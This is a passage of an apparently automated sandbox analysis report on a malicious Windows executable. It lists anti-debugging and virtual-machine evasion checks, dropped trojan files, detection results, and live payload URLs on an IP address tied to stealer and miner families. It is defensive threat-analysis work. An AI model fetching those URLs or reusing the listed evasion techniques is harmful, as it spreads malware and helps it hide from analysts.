Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00825CD4 rdtsc 0_2_00825CD4
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2589
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2375
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2381
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe TID: 7368 Thread sleep count: 58 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7368 Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7328 Thread sleep count: 46 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7328 Thread sleep count: 82 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7340 Thread sleep count: 2589 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7340 Thread sleep time: -5180589s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7328 Thread sleep count: 40 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7328 Thread sleep count: 154 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7448 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7352 Thread sleep count: 106 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7352 Thread sleep time: -212106s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7348 Thread sleep count: 2375 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7348 Thread sleep time: -4752375s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7360 Thread sleep count: 105 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7360 Thread sleep time: -210105s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7344 Thread sleep count: 2381 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7344 Thread sleep time: -4764381s >= -30000s
Source: file.exe, file.exe, 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmp - Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr - Binary or memory string: VMware
Source: Amcache.hve.6.dr - Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr - Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr - Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr - Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr - Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr - Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr - Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.2278951429.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253670934.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101913818.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177695889.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202839902.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152495724.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127385618.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313770429.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228425864.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076681288.0000000005474000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr - Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr - Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr - Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr - Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr - Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr - Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr - Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr - Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr - Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr - Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr - Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr - Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr - Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr - Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr - Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr - Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr - Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr - Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr - Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr - Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmp - Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr - Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe - System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe - Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe - Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe - Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe - File opened: NTICE
Source: C:\Users\user\Desktop\file.exe - File opened: SICE
Source: C:\Users\user\Desktop\file.exe - File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe - Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe - Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe - Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_00825CD4 rdtsc
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_00F4C9DB push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_04D10D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_04D1092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_0040A6E0 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_04D19C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_04D1A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_04D1D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_04D1A947 SetUnhandledExceptionFilter
Source: file.exe, file.exe, 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmp - Binary or memory string: hProgram Manager
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_0040A2AC cpuid
Source: C:\Users\user\Desktop\file.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
Source: Amcache.hve.6.dr - Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr - Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr - Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr - Binary or memory string: MsMpEng.exe
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 2 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 24 Virtualization/Sandbox Evasion | LSASS Memory | 781 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Process Injection | Security Account Manager | 24 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 223 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| file.exe | 45% | ReversingLabs | Win32.Infostealer.Tinba | |
| file.exe | 100% | Avira | HEUR/AGEN.1320706 | |
| file.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent | |
| C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent | |
No Antivirus matches
No Antivirus matches
No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://80.82.65.70/dll/download | false | | high |
| http://80.82.65.70/dll/key | false | | high |
| http://80.82.65.70/files/download | false | | high |
| http://80.82.65.70/soft/download | false | | high |
| http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp | false | | high |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 80.82.65.70 | unknown | Netherlands | | 202425 | INT-NETWORKSC | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574319
Start date and time: 2024-12-13 08:34:27 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.evad.winEXE@2/15@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 4.175.87.197, 13.107.246.63, 20.12.23.50, 20.190.177.22
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
                      Time | Type | Description
                      02:35:53 | API Interceptor | 485821x Sleep call for process: file.exe modified
                      02:36:56 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      80.82.65.70 | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70/name
                      80.82.65.70 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70/soft/download
                      80.82.65.70 | file.exe | malicious | Unknown | 80.82.65.70/soft/download
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      INT-NETWORKSC | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70
                      INT-NETWORKSC | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70
                      INT-NETWORKSC | file.exe | malicious | Unknown | 80.82.65.70
                      No context
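                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Unknown |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Unknown |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Unknown |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Unknown |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Unknown |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Unknown |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar |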
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9700866335146597
                                          Encrypted:false
                                          SSDEEP:192:Vu9mX+vvZPiA0u1mqI3judvszuiFJiZ24IO8TVBV:Axou1m5jPzuiFJiY4IO8X
                                          MD5:E83898C8E458EC9E8E993239517C9979
                                          SHA1:304B023B3064B90437FF3ED57CFB0512ACF1B893
                                          SHA-256:02BFE5D58A55A40D8F5AE085E537C827FBBC7544F1CD437E597406C70E8CCDC9
                                          SHA-512:655B69AF385D1193D27A0CAD0F8B0A39F6A6FDFACCB1171B751461FE507EBC85A648006DB362302DC255C22F0EDB2B76E91451B337340F09E2C72D2A3A8DAB28
                                          Malicious:true
                                          Reputation:low
                                          Preview:Version=1 EventType=APPCRASH EventTime=133785489959004971 ReportType=2 Consent=1 UploadTime=133785489966817587 ReportStatus=655456 ReportIdentifier=c05b36dd-8b5d-4457-8f5d-16c063c05959 IntegratorReportIdentifier=6ab257cc-df59-4da2-addf-a157bccdae54 Wow64Host=34404 Wow64Guest=332 NsAppName=file.exe AppSessionGuid=00001c9c-0001-0014-d447-7e91314ddb01 TargetAppId=W:0006614979fa607e38d27905b1f151f1c25800001506!00006abb6112d7bcee3f5ca9837ad3f0a0016267fc63!file.exe TargetAppVer=2024//12
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Fri Dec 13 07:36:36 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):46364
                                          Entropy (8bit):2.5496104297496887
                                          Encrypted:false
                                          SSDEEP:384:nyOrqUX5jht16YfGr/RVEw2NkOiOogbTS/L/ziXkf4/:ystJjD1nfGTRVEdEg/SLGb
                                          MD5:40B938D311E006E481A64FD10A1654BB
                                          SHA1:9CDCE774157C676D4F047E01A28432138F39E85F
                                          SHA-256:5EFC3B18CF1DDF93730615B0E8C35748C240CF3F59CDCAF74F399453A35BB322
                                          SHA-512:11D31648F834B75E0C2E442AA2E2B3040854B8B02019C34CAE07E576D3AD8B3AEB8A8ED5DC5B95FB8CD27491FBE3E4918955EC2A163C26A65B8988DB60521002
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8298
                                          Entropy (8bit):3.695362519892794
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJV4CU6E6Y9WSUUCgmfBGW6pD+89bIRisfc4m:R6lXJVc6E6YMSURgmfZgIRhfC
                                          MD5:BCDEDB04A3BB0DD20D38F131381C8B1E
                                          SHA1:A224A6BBC66DCCE9A8BC76201E593ADC3BB2B703
                                          SHA-256:52134921C2EB3AA9A622F61CA52DD39227E68421A0CDBC8E55D3B6A98F5AA738
                                          SHA-512:795117A0086E385778F462FB4BFBF5CA7681CA3230277E6892F2D7FE4C6C9FA34B164A0B48250DAD028E4D6FE514CA2BC9FE465E8E7A3B01E7EAC2A44F4AA40E
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7324</Pi
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4541
                                          Entropy (8bit):4.428840149865463
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsmJg77aI9NiWpW8VY5Ym8M4JBRFme+q82Vk1Z+wd:uIjf8I7nj7VdJoe1g+wd
                                          MD5:E32310D077F2A8F803EB46C5B66D4540
                                          SHA1:994C2F8232EE22C0C07906CBAE8EFA43917D7D6E
                                          SHA-256:E7EAEF9AE47101D3E59A0C538F11BEB4891C68B73BBC84BA5D892F19E4D2DE48
                                          SHA-512:8D99986C133CBD09B00BD1995FCF71EE1FFF0AFE5C558A4FD7EE24B911B0F192C3B618282659FCD5C3D41B2342AA09853ECD0678C43A04A833971B285A09DABE
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629199" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:0
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          Reputation:high, very likely benign file
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
